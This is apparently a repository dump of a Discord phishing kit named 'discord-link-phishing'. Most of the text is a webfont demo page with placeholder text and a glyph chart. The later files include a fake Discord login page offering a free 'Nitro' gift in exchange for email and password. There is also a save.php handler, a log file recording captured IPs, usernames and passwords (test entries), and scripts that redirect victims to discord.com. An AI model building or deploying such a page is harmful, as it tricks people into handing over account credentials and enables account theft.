145 | 146 |
147 | 148 |
149 | 150 |
151 |
152 |

20.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

153 |
154 |
155 |

24.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

156 |
157 | 158 |
159 | 160 |
161 | 162 |
163 |
164 |

30.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

165 |
166 |
167 | 168 |
169 | 170 | 171 | 172 |
173 |
174 |

10.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

175 | 176 |
177 |
178 |

11.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

179 | 180 |
181 |
182 |

12.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

183 | 184 |
185 |
186 |

13.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

187 | 188 |
189 |
190 | 191 |
192 | 193 |
194 |
195 |

14.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

196 | 197 |
198 |
199 |

16.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

200 | 201 |
202 |
203 |

18.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

204 | 205 |
206 |
207 | 208 |
209 | 210 |
211 |
212 |

20.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

213 |
214 |
215 |

24.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

216 |
217 | 218 |
219 | 220 |
221 | 222 |
223 |
224 |

30.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

225 |
226 |
227 | 228 |
229 | 230 | 231 | 232 | 233 |
234 | 235 |
236 | 237 |
238 | 239 |
240 |

Lorem Ipsum Dolor

241 |

Etiam porta sem malesuada magna mollis euismod

242 | 243 | 244 |
245 |
246 |
247 |
248 |

Donec sed odio dui. Morbi leo risus, porta ac consectetur ac, vestibulum at eros. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus.

249 | 250 | 251 |

Pellentesque ornare sem

252 | 253 |

Maecenas sed diam eget risus varius blandit sit amet non magna. Maecenas faucibus mollis interdum. Donec ullamcorper nulla non metus auctor fringilla. Nullam id dolor id nibh ultricies vehicula ut id elit. Nullam id dolor id nibh ultricies vehicula ut id elit.

254 | 255 |

Aenean eu leo quam. Pellentesque ornare sem lacinia quam venenatis vestibulum. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.

256 | 257 |

Nulla vitae elit libero, a pharetra augue. Praesent commodo cursus magna, vel scelerisque nisl consectetur et. Aenean lacinia bibendum nulla sed consectetur.

258 | 259 |

Nullam quis risus eget urna mollis ornare vel eu leo. Nullam quis risus eget urna mollis ornare vel eu leo. Maecenas sed diam eget risus varius blandit sit amet non magna. Donec ullamcorper nulla non metus auctor fringilla.

260 | 261 |

Cras mattis consectetur

262 | 263 |

Aenean eu leo quam. Pellentesque ornare sem lacinia quam venenatis vestibulum. Aenean lacinia bibendum nulla sed consectetur. Integer posuere erat a ante venenatis dapibus posuere velit aliquet. Cras mattis consectetur purus sit amet fermentum.

264 | 265 |

Nullam id dolor id nibh ultricies vehicula ut id elit. Nullam quis risus eget urna mollis ornare vel eu leo. Cras mattis consectetur purus sit amet fermentum.

266 |
267 | 268 | 285 |
286 | 287 |
288 | 289 | 290 | 291 | 292 | 293 | 294 |
295 |
296 |
297 | 298 |

Language Support

299 |

The subset of Uni Sans Heavy CAPS Regular in this kit supports the following languages:
300 | 301 | Albanian, Basque, Breton, Chamorro, Danish, Dutch, English, Faroese, Finnish, French, Frisian, Galician, German, Icelandic, Italian, Malagasy, Norwegian, Portuguese, Spanish, Alsatian, Aragonese, Arapaho, Arrernte, Asturian, Aymara, Bislama, Cebuano, Corsican, Fijian, French_creole, Genoese, Gilbertese, Greenlandic, Haitian_creole, Hiligaynon, Hmong, Hopi, Ibanag, Iloko_ilokano, Indonesian, Interglossa_glosa, Interlingua, Irish_gaelic, Jerriais, Lojban, Lombard, Luxembourgeois, Manx, Mohawk, Norfolk_pitcairnese, Occitan, Oromo, Pangasinan, Papiamento, Piedmontese, Potawatomi, Rhaeto-romance, Romansh, Rotokas, Sami_lule, Samoan, Sardinian, Scots_gaelic, Seychelles_creole, Shona, Sicilian, Somali, Southern_ndebele, Swahili, Swati_swazi, Tagalog_filipino_pilipino, Tetum, Tok_pisin, Uyghur_latinized, Volapuk, Walloon, Warlpiri, Xhosa, Yapese, Zulu, Latinbasic, Ubasic, Demo

302 |

Glyph Chart

303 |

The subset of Uni Sans Heavy CAPS Regular in this kit includes all the glyphs listed below. Unicode entities are included above each glyph to help you insert individual characters into your layout.

304 |
305 | 306 |

 

307 |

!

!
308 |

"

"
309 |

#

#
310 |

$

$
311 |

%

%
312 |

&

&
313 |

'

'
314 |

(

(
315 |

)

)
316 |

*

*
317 |

+

+
318 |

,

,
319 |

-

-
320 |

.

.
321 |

/

/
322 |

0

0
323 |

1

1
324 |

2

2
325 |

3

3
326 |

4

4
327 |

5

5
328 |

6

6
329 |

7

7
330 |

8

8
331 |

9

9
332 |

:

:
333 |

&#59;

;
334 |

<

<
335 |

&#61;

=
336 |

&#62;

>
337 |

&#63;

?
338 |

&#64;

@
339 |

&#65;

A
340 |

&#66;

B
341 |

&#67;

C
342 |

&#68;

D
343 |

&#69;

E
344 |

&#70;

F
345 |

&#71;

G
346 |

&#72;

H
347 |

&#73;

I
348 |

&#74;

J
349 |

&#75;

K
350 |

&#76;

L
351 |

&#77;

M
352 |

&#78;

N
353 |

&#79;

O
354 |

&#80;

P
355 |

&#81;

Q
356 |

&#82;

R
357 |

&#83;

S
358 |

&#84;

T
359 |

&#85;

U
360 |

&#86;

V
361 |

&#87;

W
362 |

&#88;

X
363 |

&#89;

Y
364 |

&#90;

Z
365 |

&#91;

[
366 |

&#92;

\
367 |

&#93;

]
368 |

&#94;

^
369 |

&#95;

_
370 |

&#96;

`
371 |

&#97;

a
372 |

&#98;

b
373 |

&#99;

c
374 |

&#100;

d
375 |

&#101;

e
376 |

&#102;

f
377 |

&#103;

g
378 |

&#104;

h
379 |

&#105;

i
380 |

&#106;

j
381 |

&#107;

k
382 |

&#108;

l
383 |

&#109;

m
384 |

&#110;

n
385 |

&#111;

o
386 |

&#112;

p
387 |

&#113;

q
388 |

&#114;

r
389 |

&#115;

s
390 |

&#116;

t
391 |

&#117;

u
392 |

&#118;

v
393 |

&#119;

w
394 |

&#120;

x
395 |

&#121;

y
396 |

&#122;

z
397 |

&#123;

{
398 |

&#124;

|
399 |

&#125;

}
400 |

&#126;

~
401 |

&#160;

 
402 |

&#161;

¡
403 |

&#162;

¢
404 |

&#163;

£
405 |

&#164;

¤
406 |

&#165;

¥
407 |

&#166;

¦
408 |

&#167;

§
409 |

&#168;

¨
410 |

&#169;

©
411 |

&#170;

ª
412 |

&#171;

«
413 |

&#172;

¬
414 |

&#173;

­
415 |

&#174;

®
416 |

&#175;

¯
417 |

&#176;

°
418 |

&#177;

±
419 |

&#178;

²
420 |

&#179;

³
421 |

&#180;

´
422 |

&#181;

µ
423 |

&#182;

424 |

&#183;

·
425 |

&#184;

¸
426 |

&#185;

¹
427 |

&#186;

º
428 |

&#187;

»
429 |

&#188;

¼
430 |

&#189;

½
431 |

&#190;

¾
432 |

&#191;

¿
433 |

&#192;

À
434 |

&#193;

Á
435 |

&#194;

Â
436 |

&#195;

Ã
437 |

&#196;

Ä
438 |

&#197;

Å
439 |

&#198;

Æ
440 |

&#199;

Ç
441 |

&#200;

È
442 |

&#201;

É
443 |

&#202;

Ê
444 |

&#203;

Ë
445 |

&#204;

Ì
446 |

&#205;

Í
447 |

&#206;

Î
448 |

&#207;

Ï
449 |

&#208;

Ð
450 |

&#209;

Ñ
451 |

&#210;

Ò
452 |

&#211;

Ó
453 |

&#212;

Ô
454 |

&#213;

Õ
455 |

&#214;

Ö
456 |

&#215;

×
457 |

&#216;

Ø
458 |

&#217;

Ù
459 |

&#218;

Ú
460 |

&#219;

Û
461 |

&#220;

Ü
462 |

&#221;

Ý
463 |

&#222;

Þ
464 |

&#223;

ß
465 |

&#224;

à
466 |

&#225;

á
467 |

&#226;

â
468 |

&#227;

ã
469 |

&#228;

ä
470 |

&#229;

å
471 |

&#230;

æ
472 |

&#231;

ç
473 |

&#232;

è
474 |

&#233;

é
475 |

&#234;

ê
476 |

&#235;

ë
477 |

&#236;

ì
478 |

&#237;

í
479 |

&#238;

î
480 |

&#239;

ï
481 |

&#240;

ð
482 |

&#241;

ñ
483 |

&#242;

ò
484 |

&#243;

ó
485 |

&#244;

ô
486 |

&#245;

õ
487 |

&#246;

ö
488 |

&#247;

÷
489 |

&#248;

ø
490 |

&#249;

ù
491 |

&#250;

ú
492 |

&#251;

û
493 |

&#252;

ü
494 |

&#253;

ý
495 |

&#254;

þ
496 |

&#255;

ÿ
497 |

&#338;

Œ
498 |

&#339;

œ
499 |

&#376;

Ÿ
500 |

&#710;

ˆ
501 |

&#732;

˜
502 |

&#8192;

 
503 |

&#8193;

504 |

&#8194;

505 |

&#8195;

506 |

&#8196;

507 |

&#8197;

508 |

&#8198;

509 |

&#8199;

510 |

&#8200;

511 |

&#8201;

512 |

&#8202;

513 |

&#8208;

514 |

&#8209;

515 |

&#8210;

516 |

&#8211;

517 |

&#8212;

518 |

&#8216;

519 |

&#8217;

520 |

&#8218;

521 |

&#8220;

522 |

&#8221;

523 |

&#8222;

524 |

&#8226;

525 |

&#8230;

526 |

&#8239;

527 |

&#8249;

528 |

&#8250;

529 |

&#8287;

530 |

&#8364;

531 |

&#8482;

532 |

&#9724;

533 |

&#64257;

534 |

&#64258;

535 |
536 |
537 | 538 | 539 |
540 |
541 | 542 | 543 |
544 | 545 |
546 | 547 |
548 |
549 |
550 |

Installing Webfonts

551 | 552 |

Webfonts are supported by all major browser platforms but not all in the same way. There are currently four different font formats that must be included in order to target all browsers. This includes TTF, WOFF, EOT and SVG.

553 | 554 |

1. Upload your webfonts

555 |

You must upload your webfont kit to your website. They should be in or near the same directory as your CSS files.

556 | 557 |

2. Include the webfont stylesheet

558 |

A special CSS @font-face declaration helps the various browsers select the appropriate font it needs without causing you a bunch of headaches. Learn more about this syntax by reading the Fontspring blog post about it. The code for it is as follows:

559 | 560 | 561 | 562 | @font-face{ 563 | font-family: 'MyWebFont'; 564 | src: url('WebFont.eot'); 565 | src: url('WebFont.eot?#iefix') format('embedded-opentype'), 566 | url('WebFont.woff') format('woff'), 567 | url('WebFont.ttf') format('truetype'), 568 | url('WebFont.svg#webfont') format('svg'); 569 | } 570 | 571 | 572 |

We've already gone ahead and generated the code for you. All you have to do is link to the stylesheet in your HTML, like this:

573 | <link rel="stylesheet" href="stylesheet.css" type="text/css" charset="utf-8" /> 574 | 575 |

3. Modify your own stylesheet

576 |

To take advantage of your new fonts, you must tell your stylesheet to use them. Look at the original @font-face declaration above and find the property called "font-family." The name linked there will be what you use to reference the font. Prepend that webfont name to the font stack in the "font-family" property, inside the selector you want to change. For example:

577 | p { font-family: 'WebFont', Arial, sans-serif; } 578 | 579 |

4. Test

580 |

Getting webfonts to work cross-browser can be tricky. Use the information in the sidebar to help you if you find that fonts aren't loading in a particular browser.

581 |
582 | 583 | 609 |
610 | 611 |
612 | 613 |
614 | 617 |
618 | 619 | -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/assest/heavy/uni_sans_heavy-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XKMR/discord-link-phishing/8f09be955c8def81d5fbe2ad7195830ed1657647/gift/HJ9fh9hGfgfijh93/assest/heavy/uni_sans_heavy-webfont.woff -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/assest/heavy/uni_sans_heavy-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XKMR/discord-link-phishing/8f09be955c8def81d5fbe2ad7195830ed1657647/gift/HJ9fh9hGfgfijh93/assest/heavy/uni_sans_heavy-webfont.woff2 -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/assest/style.css: -------------------------------------------------------------------------------- 1 | @font-face { 2 | font-family: 'uni_sansheavy_caps'; 3 | src: url('heavy/uni_sans_heavy-webfont.woff2') format('woff2'), 4 | url('heavy/uni_sans_heavy-webfont.woff') format('woff'); 5 | font-weight: normal; 6 | font-style: normal; 7 | 8 | } 9 | body{ 10 | color: white; 11 | background-image: url("background.jpg"); 12 | font-family: uni_sansheavy_caps; 13 | } 14 | .loginPart{ 15 | background-color: #36393F; 16 | border-radius: 5%; 17 | position: fixed; /* or absolute */ 18 | top: 50%; 19 | left: 50%; 20 | /* bring your own prefixes */ 21 | transform: translate(-50%, -50%); 22 | height: 500px; 23 | width: 500px; 24 | } 25 | .submit{ 26 | font-size: 30px; 27 | background-color: #5865F2; 28 | border-radius: 7%; 29 | border-color: #5865F2; 30 | color: white; 31 | height: 80px; 32 | width: 400px; 33 | } 34 | .inputs{ 35 | color: #FFFFFF; 36 | border-radius: 5%; 37 | background-color: #303339; 38 | border-color: #222428; 39 | margin-top: 0px; 40 | margin-right: 0px; 41 | margin-bottom: 0px; 42 | margin-left: 0px; 43 | padding-top: 0px; 44 | padding-right: 0px; 45 | padding-bottom: 0px; 46 | padding-left: 0px; 47 | border-width: 1px; 48 | width: 400px; 49 | height: 30px; 50 | } -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/login/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |
14 |
15 |


16 |                  You Have Been Gifted a 3 Month Nitro! you need to                  login to earn it. 17 |


18 |

Welcome Back!

19 |
20 | Email or Phone number: 21 |
22 |
23 | 24 |
25 | Password: 26 |
27 | 28 |

29 | 30 |
31 |
32 |
33 | 34 | 35 | -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/login/save.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | you can set this page to anything. (location: gift/HJ9fh9hGfgfijh93/login/save.php) 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/login/savedata.txt: -------------------------------------------------------------------------------- 1 | 2 | - IP: 127.0.0.1 Username: gtfh Password: ghgh 3 | 4 | - IP: 127.0.0.1 Username: kamyar Password: kdfd 5 | 6 | - IP: 127.0.0.1 Username: kamyar Password: kdfd 7 | 8 | - IP: 127.0.0.1 Username: dasd Password: dsd 9 | 10 | - IP: 127.0.0.1 Username: dasd Password: dsd 11 | 12 | - IP: 127.0.0.1 Username: kamyar Password: kdfd 13 | 14 | - IP: 127.0.0.1 Username: asd Password: sd 15 | 16 | - IP: 127.0.0.1 Username: asd Password: sd 17 | 18 | - IP: 127.0.0.1 Username: asd Password: sd 19 | 20 | - IP: 127.0.0.1 Username: asd Password: sd 21 | 22 | - IP: 127.0.0.1 Username: asd Password: sd 23 | 24 | -------------------------------------------------------------------------------- /gift/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /gift/redict-to-gift.js: -------------------------------------------------------------------------------- 1 | window.location.replace("https://discord.com"); -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /redict-to-gift.js: -------------------------------------------------------------------------------- 1 | window.location.replace("https://discord.com"); --------------------------------------------------------------------------------